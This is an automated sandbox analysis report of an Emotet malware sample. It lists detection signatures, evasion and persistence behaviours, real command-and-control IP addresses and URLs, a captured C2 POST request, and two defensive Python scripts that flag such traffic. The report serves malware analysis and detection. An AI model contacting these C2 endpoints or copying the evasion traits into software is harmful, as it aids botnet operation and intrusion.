Analysis Report lHuFdWpoMA

Overview

General Information

Sample Name: lHuFdWpoMA (renamed file extension from none to exe)
Analysis ID: 317573
MD5: 8967e3008512256a506324217a015f4f
SHA1: 84f134646e979ef99b18243c922e81c45af9031c
SHA256: e85e1e11de6d268f5865af913c80d8e93f1ced5939fd5066958ceb5ffc499abc

Detection

Emotet
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: lHuFdWpoMA.exe Metadefender: Detection: 48%
Source: lHuFdWpoMA.exe ReversingLabs: Detection: 72%
Machine Learning detection for sample
Source: lHuFdWpoMA.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB22C0 CryptExportKey,CryptDestroyHash,memcpy,CryptEncrypt,RtlAllocateHeap,CryptDuplicateHash,CryptGetHashParam, 3_2_00FB22C0
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB2680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey, 3_2_00FB2680
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB1FF0 memcpy,CryptDuplicateHash,CryptDestroyHash,RtlAllocateHeap, 3_2_00FB1FF0
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB3A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose, 0_2_02BB3A20
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB3A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose, 3_2_00FB3A20

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.3:49710 -> 190.202.229.74:80
Source: Traffic Snort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.3:49731 -> 118.69.11.81:7080
Source: Traffic Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.3:49735 -> 70.39.251.94:8080
Source: Traffic Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.3:49744 -> 87.230.25.43:8080
Source: Traffic Snort IDS: 2404348 ET CNC Feodo Tracker Reported CnC Server TCP group 25 192.168.2.3:49747 -> 94.23.62.116:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49731 -> 118.69.11.81:7080
Source: global traffic TCP traffic: 192.168.2.3:49735 -> 70.39.251.94:8080
Source: global traffic TCP traffic: 192.168.2.3:49744 -> 87.230.25.43:8080
Source: global traffic TCP traffic: 192.168.2.3:49747 -> 94.23.62.116:8080
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 87.230.25.43 87.230.25.43
Source: Joe Sandbox View IP Address: 94.23.62.116 94.23.62.116
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: Joe Sandbox View ASN Name: CANTVServiciosVenezuelaVE CANTVServiciosVenezuelaVE
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.3:49710 -> 190.202.229.74:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /48dh/ctaQ/OMGH8qloe/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 94.23.62.116/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------4zrYFze4User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 94.23.62.116:8080Content-Length: 4580Cache-Control: no-cache
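The captured POST above carries several traits that, taken together, separate Emotet check-in traffic from a browser: a literal IP in the Host header, a non-standard port, a multipart/form-data upload of an opaque blob, a Referer that is just the C2 host, and random alphanumeric URI segments. The following triage routine is an added example, not part of the Joe Sandbox report and not the sandbox's own signature logic. The request is the report's own capture re-split one header per line (the 4580-byte body is omitted); the scoring rules, including the assumption that Internet Explorer never sends an Upgrade-Insecure-Requests header, are this example's own.

```python
"""Flag Emotet-style C2 traits in an HTTP request (added example)."""
import ipaddress

# The request from the report, re-split one header per line. The body is
# omitted; only the headers are scored.
CAPTURED_REQUEST = (
    "POST /48dh/ctaQ/OMGH8qloe/ HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,"
    "image/webp,*/*;q=0.8\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "DNT: 1\r\n"
    "Connection: keep-alive\r\n"
    "Referer: 94.23.62.116/\r\n"
    "Upgrade-Insecure-Requests: 1\r\n"
    "Content-Type: multipart/form-data; boundary=--------4zrYFze4\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; "
    "Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; "
    ".NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\n"
    "Host: 94.23.62.116:8080\r\n"
    "Content-Length: 4580\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (method, path, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def split_host(host_header):
    """Return (host, port) from a Host header; port defaults to 80."""
    host, _, port = host_header.partition(":")
    return host, int(port) if port else 80


def is_literal_ip(host):
    """True when the Host value is an IP address rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage(raw):
    """Return the list of suspicious traits found in the request."""
    method, path, h = parse_request(raw)
    reasons = []
    host, port = split_host(h.get("host", ""))
    if is_literal_ip(host):
        reasons.append("Host header is a literal IP, no DNS name")
    if port not in (80, 443):
        reasons.append(f"HTTP on non-standard port {port}")
    if method == "POST" and h.get("content-type", "").startswith("multipart/form-data"):
        reasons.append("multipart/form-data POST carrying an opaque blob")
    # Browsers send the page they came from as Referer; Emotet sends the C2 host.
    referer = h.get("referer", "").rstrip("/").split("://")[-1]
    if referer and referer == host:
        reasons.append("Referer is just the C2 host itself")
    # Assumption: IE does not emit Upgrade-Insecure-Requests, so an MSIE
    # user agent combined with that header is a forged browser fingerprint.
    if "MSIE" in h.get("user-agent", "") and "upgrade-insecure-requests" in h:
        reasons.append("MSIE user agent but sends Upgrade-Insecure-Requests")
    segments = [s for s in path.split("/") if s]
    if segments and all(s.isalnum() for s in segments):
        reasons.append("URI is random alphanumeric segments with no file extension")
    return reasons


if __name__ == "__main__":
    for reason in triage(CAPTURED_REQUEST):
        print("-", reason)
```

Each trait on its own is weak (plenty of internal tools POST to IP:port), so the value is in the combination; a practitioner would feed this a proxy or Zeek http.log export and alert only when three or more traits line up.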
Source: unknown TCP traffic detected without corresponding DNS query: 190.202.229.74
Source: unknown TCP traffic detected without corresponding DNS query: 190.202.229.74
Source: unknown TCP traffic detected without corresponding DNS query: 190.202.229.74
Source: unknown TCP traffic detected without corresponding DNS query: 118.69.11.81
Source: unknown TCP traffic detected without corresponding DNS query: 118.69.11.81
Source: unknown TCP traffic detected without corresponding DNS query: 118.69.11.81
Source: unknown TCP traffic detected without corresponding DNS query: 70.39.251.94
Source: unknown TCP traffic detected without corresponding DNS query: 70.39.251.94
Source: unknown TCP traffic detected without corresponding DNS query: 70.39.251.94
Source: unknown TCP traffic detected without corresponding DNS query: 87.230.25.43
Source: unknown TCP traffic detected without corresponding DNS query: 87.230.25.43
Source: unknown TCP traffic detected without corresponding DNS query: 87.230.25.43
Source: unknown TCP traffic detected without corresponding DNS query: 94.23.62.116
Source: unknown TCP traffic detected without corresponding DNS query: 94.23.62.116
Source: unknown TCP traffic detected without corresponding DNS query: 94.23.62.116
Source: unknown TCP traffic detected without corresponding DNS query: 94.23.62.116
Source: unknown TCP traffic detected without corresponding DNS query: 94.23.62.116
Source: unknown TCP traffic detected without corresponding DNS query: 94.23.62.116
Source: unknown TCP traffic detected without corresponding DNS query: 94.23.62.116
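Every C2 contact above was made to an IP address the sample never looked up, which is the hallmark of a hard-coded peer list. The correlation below is an added example, not part of the report: it joins a DNS log against a connection log and flags any destination that was not returned in a DNS answer to the same client beforehand, then adds the port and blocklist observations the report makes. The log lines are constructed (Zeek-like tab-separated fields) to mirror the report's traffic from 192.168.2.3; the blocklist is simply the five destinations the Snort Feodo Tracker alerts named, used here as a stand-in for a real feed.

```python
"""Flag connections to destinations with no prior DNS answer (added example)."""
import ipaddress

# Destinations named by the report's Snort / Feodo Tracker hits, used as a
# local blocklist for this example.
FEODO_HITS = {"190.202.229.74", "118.69.11.81", "70.39.251.94",
              "87.230.25.43", "94.23.62.116"}

# Constructed DNS log: ts, client, query, answer
DNS_LOG = """\
1605000001\t192.168.2.3\twww.example.com\t93.184.216.34
"""

# Constructed connection log: ts, src, dst, dport (mirrors the report's flows)
CONN_LOG = """\
1605000002\t192.168.2.3\t93.184.216.34\t443
1605000010\t192.168.2.3\t190.202.229.74\t80
1605000020\t192.168.2.3\t118.69.11.81\t7080
1605000025\t192.168.2.3\t70.39.251.94\t8080
1605000030\t192.168.2.3\t87.230.25.43\t8080
1605000035\t192.168.2.3\t94.23.62.116\t8080
"""


def parse_tsv(text):
    """Split tab-separated log text into rows, skipping blanks and comments."""
    return [line.split("\t") for line in text.splitlines()
            if line and not line.startswith("#")]


def first_dns_answer(dns_rows):
    """Map (client, answered_ip) -> earliest timestamp that answer was seen."""
    first = {}
    for ts, client, _query, answer in dns_rows:
        key = (client, answer)
        first[key] = min(first.get(key, float("inf")), int(ts))
    return first


def flag_connections(dns_text, conn_text, blocklist=FEODO_HITS):
    """Return (dst, dport, reasons) for every connection worth a look."""
    seen = first_dns_answer(parse_tsv(dns_text))
    findings = []
    for ts, src, dst, dport in parse_tsv(conn_text):
        # Private/loopback destinations are LAN noise for this check.
        if not ipaddress.ip_address(dst).is_global:
            continue
        reasons = []
        answered_at = seen.get((src, dst))
        if answered_at is None or answered_at > int(ts):
            reasons.append("no prior DNS answer for destination")
        if int(dport) not in (80, 443):
            reasons.append(f"non-standard port {dport}")
        if dst in blocklist:
            reasons.append("destination on C2 blocklist")
        if reasons:
            findings.append((dst, int(dport), reasons))
    return findings


if __name__ == "__main__":
    for dst, dport, reasons in flag_connections(DNS_LOG, CONN_LOG):
        print(f"{dst}:{dport}  " + "; ".join(reasons))
```

The resolved connection to 93.184.216.34:443 produces nothing, while all five report destinations are flagged; 190.202.229.74 on port 80 is caught by the DNS and blocklist checks alone, so the DNS correlation matters most exactly where the port heuristic is silent. In production the DNS side should also honour TTLs and cached answers from earlier days, otherwise long-lived browser connections produce false positives.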
Source: unknown HTTP traffic detected: POST /48dh/ctaQ/OMGH8qloe/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 94.23.62.116/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------4zrYFze4User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 94.23.62.116:8080Content-Length: 4580Cache-Control: no-cache
Source: powercpl.exe, 00000003.00000002.483052595.000000000104A000.00000004.00000020.sdmp String found in binary or memory: http://118.69.11.81:7080/tK9EDRkYy27/AJw9/dfLcUf/KA6OeQzQ3/SqFxzoZYFfsXb/bDVV6G8hRmbQL/
Source: powercpl.exe, 00000003.00000002.483052595.000000000104A000.00000004.00000020.sdmp String found in binary or memory: http://118.69.11.81:7080/tK9EDRkYy27/AJw9/dfLcUf/KA6OeQzQ3/SqFxzoZYFfsXb/bDVV6G8hRmbQL/)
Source: powercpl.exe, 00000003.00000002.483052595.000000000104A000.00000004.00000020.sdmp String found in binary or memory: http://118.69.11.81:7080/tK9EDRkYy27/AJw9/dfLcUf/KA6OeQzQ3/SqFxzoZYFfsXb/bDVV6G8hRmbQL/q
Source: powercpl.exe, 00000003.00000002.483052595.000000000104A000.00000004.00000020.sdmp String found in binary or memory: http://190.202.229.74/xPV9/
Source: powercpl.exe, 00000003.00000002.483052595.000000000104A000.00000004.00000020.sdmp String found in binary or memory: http://190.202.229.74/xPV9/$
Source: powercpl.exe, 00000003.00000002.483651764.0000000002B74000.00000004.00000001.sdmp String found in binary or memory: http://70.39.251.94:8080/9nrmkTAX1ErIlUSIMf/
Source: powercpl.exe, 00000003.00000002.483651764.0000000002B74000.00000004.00000001.sdmp String found in binary or memory: http://70.39.251.94:8080/9nrmkTAX1ErIlUSIMf/h=
Source: powercpl.exe, 00000003.00000002.483651764.0000000002B74000.00000004.00000001.sdmp String found in binary or memory: http://70.39.251.94:8080/9nrmkTAX1ErIlUSIMf/ste
Source: powercpl.exe, 00000003.00000002.483052595.000000000104A000.00000004.00000020.sdmp String found in binary or memory: http://87.230.25.43:8080/HHcN8nf/FTstgMA2bzy2AW0J0C/E8fj7n9330a9MdVME/XS0ZafPy9G/
Source: powercpl.exe, 00000003.00000002.483052595.000000000104A000.00000004.00000020.sdmp String found in binary or memory: http://87.230.25.43:8080/HHcN8nf/FTstgMA2bzy2AW0J0C/E8fj7n9330a9MdVME/XS0ZafPy9G/0
Source: powercpl.exe, 00000003.00000002.483052595.000000000104A000.00000004.00000020.sdmp String found in binary or memory: http://87.230.25.43:8080/HHcN8nf/FTstgMA2bzy2AW0J0C/E8fj7n9330a9MdVME/XS0ZafPy9G/3A
Source: powercpl.exe, 00000003.00000002.483052595.000000000104A000.00000004.00000020.sdmp String found in binary or memory: http://87.230.25.43:8080/HHcN8nf/FTstgMA2bzy2AW0J0C/E8fj7n9330a9MdVME/XS0ZafPy9G/Y
Source: powercpl.exe, 00000003.00000002.483052595.000000000104A000.00000004.00000020.sdmp String found in binary or memory: http://87.230.25.43:8080/HHcN8nf/FTstgMA2bzy2AW0J0C/E8fj7n9330a9MdVME/XS0ZafPy9G/Z
Source: powercpl.exe, 00000003.00000002.483052595.000000000104A000.00000004.00000020.sdmp, powercpl.exe, 00000003.00000002.483651764.0000000002B74000.00000004.00000001.sdmp String found in binary or memory: http://94.23.62.116:8080/48dh/ctaQ/OMGH8qloe/
Source: powercpl.exe, 00000003.00000002.483651764.0000000002B74000.00000004.00000001.sdmp String found in binary or memory: http://94.23.62.116:8080/48dh/ctaQ/OMGH8qloe/0
Source: powercpl.exe, 00000003.00000002.483651764.0000000002B74000.00000004.00000001.sdmp String found in binary or memory: http://94.23.62.116:8080/48dh/ctaQ/OMGH8qloe/AT
Source: powercpl.exe, 00000003.00000002.483651764.0000000002B74000.00000004.00000001.sdmp String found in binary or memory: http://94.23.62.116:8080/48dh/ctaQ/OMGH8qloe/SO
Source: powercpl.exe, 00000003.00000002.483651764.0000000002B74000.00000004.00000001.sdmp String found in binary or memory: http://94.23.62.116:8080/48dh/ctaQ/OMGH8qloe/wsYjp
Source: svchost.exe, 00000005.00000002.485170071.000002062F816000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000005.00000002.485170071.000002062F816000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000005.00000002.485170071.000002062F816000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000005.00000002.484534358.000002062F770000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 0000000C.00000002.308838059.0000019981813000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000009.00000002.482207926.000001F61A43E000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000009.00000002.482207926.000001F61A43E000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000009.00000002.482207926.000001F61A43E000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000C.00000003.308478355.0000019981861000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000009.00000002.482207926.000001F61A43E000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000009.00000002.482207926.000001F61A43E000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000C.00000003.308496354.000001998185A000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.308478355.0000019981861000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.308874759.000001998183D000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.308478355.0000019981861000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000002.308889599.000001998184E000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000C.00000003.308478355.0000019981861000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.308874759.000001998183D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.308478355.0000019981861000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000C.00000003.308478355.0000019981861000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000C.00000003.308478355.0000019981861000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000C.00000002.308879668.0000019981842000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000C.00000002.308879668.0000019981842000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000C.00000003.308478355.0000019981861000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000002.308896949.000001998185D000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.308587264.0000019981840000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000C.00000003.308496354.000001998185A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000002.308896949.000001998185D000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000002.308896949.000001998185D000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000002.308889599.000001998184E000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000C.00000003.308478355.0000019981861000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.308874759.000001998183D000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.286727497.0000019981832000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000C.00000002.308874759.000001998183D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.308838059.0000019981813000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.308874759.000001998183D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308564247.0000019981845000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308564247.0000019981845000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.286727497.0000019981832000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000C.00000003.286727497.0000019981832000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000C.00000002.308889599.000001998184E000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: lHuFdWpoMA.exe, 00000000.00000002.220395314.0000000000EAA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 00000003.00000002.482882849.0000000000FB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.482751188.0000000000F74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220540137.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.482632902.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220611938.0000000002BB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220584249.0000000002B74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.powercpl.exe.fb0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.lHuFdWpoMA.exe.2bb0000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB2680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey, 3_2_00FB2680

System Summary:

Creates files inside the system directory
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File created: C:\Windows\SysWOW64\msaatext\ Jump to behavior
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File deleted: C:\Windows\SysWOW64\msaatext\powercpl.exe:Zone.Identifier Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB86F0 0_2_02BB86F0
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB8330 0_2_02BB8330
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB41B7 0_2_02BB41B7
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB4190 0_2_02BB4190
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB3CE0 0_2_02BB3CE0
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB3EE0 0_2_02BB3EE0
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB42C9 0_2_02BB42C9
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB7B30 0_2_02BB7B30
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6860 0_2_02BB6860
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A1A28E 0_2_02A1A28E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A196CE 0_2_02A196CE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A19ECE 0_2_02A19ECE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15E67 0_2_02A15E67
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A27669 0_2_02A27669
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15A7E 0_2_02A15A7E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A183FE 0_2_02A183FE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A1587E 0_2_02A1587E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15D2E 0_2_02A15D2E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15D55 0_2_02A15D55
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB86F0 3_2_00FB86F0
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB3CE0 3_2_00FB3CE0
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB3EE0 3_2_00FB3EE0
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB42C9 3_2_00FB42C9
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB41B7 3_2_00FB41B7
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB4190 3_2_00FB4190
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB6860 3_2_00FB6860
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB8330 3_2_00FB8330
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB7B30 3_2_00FB7B30
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E0587E 3_2_00E0587E
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E05D55 3_2_00E05D55
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E05D2E 3_2_00E05D2E
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E096CE 3_2_00E096CE
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E09ECE 3_2_00E09ECE
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E0A28E 3_2_00E0A28E
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E05E67 3_2_00E05E67
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E17669 3_2_00E17669
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E05A7E 3_2_00E05A7E
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E083FE 3_2_00E083FE
Sample file is different than original file name gathered from version info
Source: lHuFdWpoMA.exe, 00000000.00000002.221175912.00000000030E0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs lHuFdWpoMA.exe
Source: lHuFdWpoMA.exe, 00000000.00000002.221230123.0000000003140000.00000002.00000001.sdmp Binary or memory string: originalfilename vs lHuFdWpoMA.exe
